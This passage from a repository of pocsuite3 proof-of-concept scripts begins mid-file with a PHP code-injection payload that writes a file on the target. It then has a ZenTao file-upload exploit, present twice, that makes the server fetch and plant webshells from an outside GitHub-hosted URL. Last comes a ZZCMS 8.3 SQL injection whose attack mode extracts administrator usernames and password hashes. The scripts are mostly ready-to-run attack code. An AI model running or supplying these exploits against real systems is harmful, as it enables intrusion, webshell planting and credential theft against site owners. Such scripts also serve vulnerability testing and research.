67 | except Exception as e:
68 | logger.warn(str(e))
69 | return self.parse_output(result)
70 |
71 | def _attack(self):
72 | result = {}
73 | random_string = random_str(16)
74 | verify_payload = "searchword=1&searchtype=5&order=}{end if}{if:1)$_POST[func]($_POST[cmd]);if(1}{end if}&cmd=fwrite(fopen('" + random_string + ".php','w'),'" + random_string + "')&func=assert"
75 | veri_url = urljoin(self.url, '/search.php')
76 | shell_url = urljoin(self.url, '/' + random_string + '.php')
77 | headers = {
78 | "Content-Type": "application/x-www-form-urlencoded;charset=utf-8",
79 | "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
80 | }
81 | try:
82 | resp = requests.post(veri_url,data=verify_payload,headers=headers)
83 | time.sleep(1)
84 | resp_1 = requests.get(shell_url,headers=headers)
85 | if (random_string in resp_1.text) and resp_1.status_code == 200:
86 | result['VerifyInfo'] = {}
87 | result['VerifyInfo']['URL'] = veri_url
88 | result['VerifyInfo']['Payload'] = verify_payload
89 | result['VerifyInfo']['Shell_url'] = urljoin(self.url, '/' + random_string + '.php')
90 | result['VerifyInfo']['Shell_pass'] = "sma11stu"
91 | except Exception as e:
92 | logger.warn(str(e))
93 | return self.parse_output(result)
94 |
95 | def _shell(self):
96 | return self._attack()
97 |
98 | def parse_output(self, result):
99 | output = Output(self)
100 | if result:
101 | output.success(result)
102 | else:
103 | output.fail('target is not vulnerable')
104 | return output
105 |
106 |
107 | register_poc(DemoPOC)
108 |
--------------------------------------------------------------------------------
/文件上传漏洞-Java/zantaopms_CNVD_C_2020_121325_upload.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 | # Author : Sma11stu
3 | # Datetime : 2021/5/12 22:41
4 | # Product : PyCharm
5 | # Project : pocsuite3
6 | # File : zantaopms_CNVD_C_2020_121325_upload.py
7 | # explain : 文件说明
8 | import base64
9 | from collections import OrderedDict
10 | from pocsuite3.lib.core.interpreter_option import OptString
11 | from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
12 | from pocsuite3.lib.utils import random_str
13 |
14 |
15 | class DemoPOC(POCBase):
16 | vulID = 'xxx' # ssvid
17 | version = '3.0'
18 | author = ['seebug']
19 | vulDate = '2021-05-12'
20 | createDate = '2021-05-12'
21 | updateDate = '2021-05-12'
22 | references = ['https://paper.seebug.org/705/']
23 | name = 'CNVD-C-2020-121325 禅道后台文件上传漏洞'
24 | appPowerLink = ''
25 | appName = 'zantaopms'
26 | appVersion = '<= 12.4.2'
27 | vulType = VUL_TYPE.UPLOAD_FILES
28 | desc = '''
29 | CNVD-C-2020-121325 禅道后台文件上传漏洞
30 | '''
31 | samples = []
32 | install_requires = ['']
33 | category = POC_CATEGORY.EXPLOITS.REMOTE
34 |
35 | def _options(self):
36 | o = OrderedDict()
37 | o["zentaosid"] = OptString('', description='这个poc需要zentaosid', require=True)
38 | return o
39 |
40 | def _verify(self):
41 | result = {}
42 | random_uri = random_str(16)
43 | try:
44 | verify_payload = 'HTTPS://raw.githubusercontent.com/5huai/webshell/main/php_verify.txt'
45 | base64_payload = base64.b64encode(verify_payload.encode())
46 | verify_content = base64_payload.decode()
47 | verify_url = self.url + '/index.php?m=client&f=download&version='+ random_uri +'&link=' + verify_content
48 | logger.info(verify_url)
49 | cookies = {
50 | "zentaosid": self.get_option("zentaosid")
51 | }
52 | down_res = requests.get(verify_url,cookies=cookies)
53 | verify_info_url = self.url + '/data/client/'+random_uri+'/php_verify.txt'
54 | verify_res = requests.get(verify_info_url,cookies=cookies)
55 | if verify_res.status_code ==200 and "md5('3.1416');" in verify_res.content.decode() :
56 | result['VerifyInfo'] = {}
57 | result['VerifyInfo']['URL'] = verify_info_url
58 | result['VerifyInfo']['Payload'] = verify_payload
59 | except Exception as e:
60 | logger.warn(str(e))
61 | return self.parse_output(result)
62 |
63 | def _attack(self):
64 | result = {}
65 | random_uri = random_str(16)
66 | try:
67 | attack_payload = 'HTTPS://raw.githubusercontent.com/5huai/webshell/main/php_attack.php'
68 | base64_payload = base64.b64encode(attack_payload.encode())
69 | attack_content = base64_payload.decode()
70 | attack_url = self.url + '/index.php?m=client&f=download&version='+ random_uri +'&link=' + attack_content
71 | logger.info(attack_url)
72 | cookies = {
73 | "zentaosid": self.get_option("zentaosid")
74 | }
75 | down_res = requests.get(attack_url,cookies=cookies)
76 | attack_info_url = self.url + '/data/client/'+random_uri+'/php_attack.php'
77 | attack_res = requests.get(attack_info_url,cookies=cookies)
78 | if attack_res.status_code ==200 and "d4d7a6b8b3ed8ed86db2ef2cd728d8ec" in attack_res.content.decode() :
79 | result['VerifyInfo'] = {}
80 | result['VerifyInfo']['URL'] = attack_info_url
81 | result['VerifyInfo']['Payload'] = attack_payload
82 | except Exception as e:
83 | logger.warn(str(e))
84 | return self.parse_output(result)
85 |
86 | def _shell(self):
87 | result = {}
88 | random_uri = random_str(16)
89 | try:
90 | shell_payload = 'HTTPS://raw.githubusercontent.com/5huai/webshell/main/php_shell.php'
91 | base64_payload = base64.b64encode(shell_payload.encode())
92 | shell_content = base64_payload.decode()
93 | shell_url = self.url + '/index.php?m=client&f=download&version='+ random_uri +'&link=' + shell_content
94 | print(shell_url)
95 | cookies = {
96 | "zentaosid": self.get_option("zentaosid")
97 | }
98 | down_res = requests.get(shell_url,cookies=cookies)
99 | shell_info_url = self.url + '/data/client/'+random_uri+'/php_shell.php'
100 | logger.info("webshell地址:" + shell_info_url)
101 | shell_res = requests.get(shell_info_url,cookies=cookies)
102 | except Exception as e:
103 | logger.warn(str(e))
104 | return self.parse_output(result)
105 |
106 | def parse_output(self, result):
107 | output = Output(self)
108 | if result:
109 | output.success(result)
110 | else:
111 | output.fail('target is not vulnerable')
112 | return output
113 |
114 | register_poc(DemoPOC)
--------------------------------------------------------------------------------
/文件上传漏洞-Php/zantaopms_CNVD_C_2020_121325_upload.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 | # Author : Sma11stu
3 | # Datetime : 2021/5/12 22:41
4 | # Product : PyCharm
5 | # Project : pocsuite3
6 | # File : zantaopms_CNVD_C_2020_121325_upload.py
7 | # explain : 文件说明
8 | import base64
9 | from collections import OrderedDict
10 | from pocsuite3.lib.core.interpreter_option import OptString
11 | from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
12 | from pocsuite3.lib.utils import random_str
13 |
14 |
15 | class DemoPOC(POCBase):
16 | vulID = 'xxx' # ssvid
17 | version = '3.0'
18 | author = ['seebug']
19 | vulDate = '2021-05-12'
20 | createDate = '2021-05-12'
21 | updateDate = '2021-05-12'
22 | references = ['https://paper.seebug.org/705/']
23 | name = 'CNVD-C-2020-121325 禅道后台文件上传漏洞'
24 | appPowerLink = ''
25 | appName = 'zantaopms'
26 | appVersion = '<= 12.4.2'
27 | vulType = VUL_TYPE.UPLOAD_FILES
28 | desc = '''
29 | CNVD-C-2020-121325 禅道后台文件上传漏洞
30 | '''
31 | samples = []
32 | install_requires = ['']
33 | category = POC_CATEGORY.EXPLOITS.REMOTE
34 |
35 | def _options(self):
36 | o = OrderedDict()
37 | o["zentaosid"] = OptString('', description='这个poc需要zentaosid', require=True)
38 | return o
39 |
40 | def _verify(self):
41 | result = {}
42 | random_uri = random_str(16)
43 | try:
44 | verify_payload = 'HTTPS://raw.githubusercontent.com/5huai/webshell/main/php_verify.txt'
45 | base64_payload = base64.b64encode(verify_payload.encode())
46 | verify_content = base64_payload.decode()
47 | verify_url = self.url + '/index.php?m=client&f=download&version='+ random_uri +'&link=' + verify_content
48 | logger.info(verify_url)
49 | cookies = {
50 | "zentaosid": self.get_option("zentaosid")
51 | }
52 | down_res = requests.get(verify_url,cookies=cookies)
53 | verify_info_url = self.url + '/data/client/'+random_uri+'/php_verify.txt'
54 | verify_res = requests.get(verify_info_url,cookies=cookies)
55 | if verify_res.status_code ==200 and "md5('3.1416');" in verify_res.content.decode() :
56 | result['VerifyInfo'] = {}
57 | result['VerifyInfo']['URL'] = verify_info_url
58 | result['VerifyInfo']['Payload'] = verify_payload
59 | except Exception as e:
60 | logger.warn(str(e))
61 | return self.parse_output(result)
62 |
63 | def _attack(self):
64 | result = {}
65 | random_uri = random_str(16)
66 | try:
67 | attack_payload = 'HTTPS://raw.githubusercontent.com/5huai/webshell/main/php_attack.php'
68 | base64_payload = base64.b64encode(attack_payload.encode())
69 | attack_content = base64_payload.decode()
70 | attack_url = self.url + '/index.php?m=client&f=download&version='+ random_uri +'&link=' + attack_content
71 | logger.info(attack_url)
72 | cookies = {
73 | "zentaosid": self.get_option("zentaosid")
74 | }
75 | down_res = requests.get(attack_url,cookies=cookies)
76 | attack_info_url = self.url + '/data/client/'+random_uri+'/php_attack.php'
77 | attack_res = requests.get(attack_info_url,cookies=cookies)
78 | if attack_res.status_code ==200 and "d4d7a6b8b3ed8ed86db2ef2cd728d8ec" in attack_res.content.decode() :
79 | result['VerifyInfo'] = {}
80 | result['VerifyInfo']['URL'] = attack_info_url
81 | result['VerifyInfo']['Payload'] = attack_payload
82 | except Exception as e:
83 | logger.warn(str(e))
84 | return self.parse_output(result)
85 |
86 | def _shell(self):
87 | result = {}
88 | random_uri = random_str(16)
89 | try:
90 | shell_payload = 'HTTPS://raw.githubusercontent.com/5huai/webshell/main/php_shell.php'
91 | base64_payload = base64.b64encode(shell_payload.encode())
92 | shell_content = base64_payload.decode()
93 | shell_url = self.url + '/index.php?m=client&f=download&version='+ random_uri +'&link=' + shell_content
94 | print(shell_url)
95 | cookies = {
96 | "zentaosid": self.get_option("zentaosid")
97 | }
98 | down_res = requests.get(shell_url,cookies=cookies)
99 | shell_info_url = self.url + '/data/client/'+random_uri+'/php_shell.php'
100 | logger.info("webshell地址:" + shell_info_url)
101 | shell_res = requests.get(shell_info_url,cookies=cookies)
102 | except Exception as e:
103 | logger.warn(str(e))
104 | return self.parse_output(result)
105 |
106 | def parse_output(self, result):
107 | output = Output(self)
108 | if result:
109 | output.success(result)
110 | else:
111 | output.fail('target is not vulnerable')
112 | return output
113 |
114 | register_poc(DemoPOC)
--------------------------------------------------------------------------------
/SQL注入-Php/zzcms_8_3_sql.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 | # Author : Sma11stu
3 | # Datetime : 2021/3/21 11:22
4 | # Product : PyCharm
5 | # Project : pocsuite3
6 | # File : zzcms_8_3_sql.py
7 | # explain : 文件说明
8 |
9 | import re
10 | import json
11 | from collections import OrderedDict
12 | from urllib.parse import urljoin
13 | from requests.cookies import RequestsCookieJar
14 | from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
15 | from pocsuite3.lib.utils import random_str
16 | from pocsuite3.lib.core.interpreter_option import OptString
17 | from pocsuite3.lib.core.common import get_md5
18 |
19 | class DemoPOC(POCBase):
20 | vulID = 'xxx' # ssvid
21 | version = '3.0'
22 | author = ['seebug']
23 | vulDate = '2021-03-21'
24 | createDate = '2021-03-21'
25 | updateDate = '2021-03-21'
26 | references = ['http://keac.club/2020/02/02/CVE-2018-14961/']
27 | name = 'ZZCMS <=8.3 前台SQL 注入 CVE-2018-14961'
28 | appPowerLink = ''
29 | appName = 'ZZCMS'
30 | appVersion = '<= 8.3'
31 | vulType = VUL_TYPE.SQL_INJECTION
32 | desc = '''
33 | ZZCMS <=8.3 前台SQL 注入 CVE-2018-14961
34 | '''
35 | samples = []
36 | install_requires = ['']
37 | category = POC_CATEGORY.EXPLOITS.REMOTE
38 | headers = {
39 | "Content-Type": "application/x-www-form-urlencoded",
40 | "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
41 | }
42 |
43 | def _options(self):
44 | o = OrderedDict()
45 | o["username"] = OptString('', description='这个poc需要用户登录,请输入登录账号', require=True)
46 | o["password"] = OptString('', description='这个poc需要用户密码,请输入用户密码', require=True)
47 | return o
48 |
49 | def cookie(self):
50 | cookies = {
51 | "UserName" : self.get_option("username"),
52 | "PassWord" : get_md5(self.get_option("password"))
53 | }
54 | return cookies
55 |
56 | def add_msg(self):
57 | flag = False
58 | msg_url = urljoin(self.url, '/user/msg.php?action=savedata&saveas=add')
59 | post_data = {
60 | "info_content" : random_str(16),
61 | "Submit" : "%E6%8F%90%E4%BA%A4"
62 | }
63 | try:
64 | resp = requests.post(msg_url, data=post_data,cookies = self.cookie(),headers = self.headers)
65 | if resp.status_code == 200 and "/user/login.php" not in resp.text:
66 | flag = True
67 | logger.info("zzcms系统登录成功")
68 | else:
69 | logger.info("zzcms系统登录失败,响应状态码为:%s" % resp.status_code)
70 | except Exception as e:
71 | logger.warn(e)
72 | logger.warn("zzcms系统登录失败")
73 | return flag
74 |
75 | def _verify(self):
76 | result = {}
77 | res = self.add_msg()
78 | if res:
79 | random_uri = random_str(16)
80 | logger.info("random_uri为:%s" % random_uri)
81 | verify_payload = "select email from zzcms_dl where id=-1 union select concat(0x7e,'" + random_uri + "',0x7e) from zzcms_admin #"
82 | post_data = {
83 | "sql" : verify_payload
84 | }
85 | veri_url = urljoin(self.url, '/dl/dl_sendmail.php')
86 | try:
87 | resp = requests.post(veri_url,data=post_data,cookies=self.cookie(),headers=self.headers)
88 | flag = "~" + random_uri + "~"
89 | if flag in resp.text and resp.status_code == 200:
90 | result['VerifyInfo'] = {}
91 | result['VerifyInfo']['URL'] = veri_url
92 | result['VerifyInfo']['Payload'] = verify_payload
93 | except Exception as e:
94 | logger.warn(str(e))
95 | return self.parse_output(result)
96 |
97 | def _attack(self):
98 | result = {}
99 | res = self.add_msg()
100 | if res:
101 | verify_payload = "select email from zzcms_dl where id=-1 union select concat('flag,',admin,',',pass,',flag') from zzcms_admin #"
102 | post_data = {
103 | "sql" : verify_payload
104 | }
105 | veri_url = urljoin(self.url, '/dl/dl_sendmail.php')
106 | try:
107 | resp = requests.post(veri_url,data=post_data,cookies=self.cookie(),headers=self.headers)
108 | if "flag" in resp.text and resp.status_code ==200:
109 | sql_res = re.search('flag(.*)flag', resp.text)
110 | result['VerifyInfo'] = {}
111 | result['VerifyInfo']['URL'] = veri_url
112 | result['VerifyInfo']['Payload'] = verify_payload
113 | result['VerifyInfo']['admin_username'] = sql_res[0].split(',')[1]
114 | result['VerifyInfo']['admin_password'] = sql_res[0].split(',')[2]
115 | except Exception as e:
116 | logger.warn(str(e))
117 | return self.parse_output(result)
118 |
119 | def _shell(self):
120 | return self._attack()
121 |
122 | def parse_output(self, result):
123 | output = Output(self)
124 | if result:
125 | output.success(result)
126 | else:
127 | output.fail('target is not vulnerable')
128 | return output
129 |
130 | register_poc(DemoPOC)
131 |
--------------------------------------------------------------------------------